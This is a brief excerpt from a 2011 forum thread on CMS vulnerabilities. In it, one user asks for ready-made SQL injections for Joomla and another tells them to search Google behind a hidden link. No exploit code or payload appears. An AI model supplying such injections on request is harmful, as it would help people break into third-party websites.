Last edited by denwers; 18.04.2011 at 21:11. Reason: message added
Old 19.04.2011, 13:54   #8
Spam
RAM 256MB
Registered: 22.07.2009
Posts: 391

Re: Vulnerabilities of various CMS

Are you familiar with the SQL query language?
Old 19.04.2011, 17:13   #9
andersen62
RAM 96MB
Registered: 17.03.2011
Posts: 125

Re: Vulnerabilities of various CMS

Does anyone happen to have some injections for Joomla lying around?
Old 19.04.2011, 18:06   #10
mironich
RAM 256MB
Registered: 22.11.2010
Posts: 2,026

Re: Vulnerabilities of various CMS

Quote:
Originally posted by andersen62
Does anyone happen to have some injections for Joomla lying around?
Grab Google and go, [link available to registered users only]
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Translation: zCarot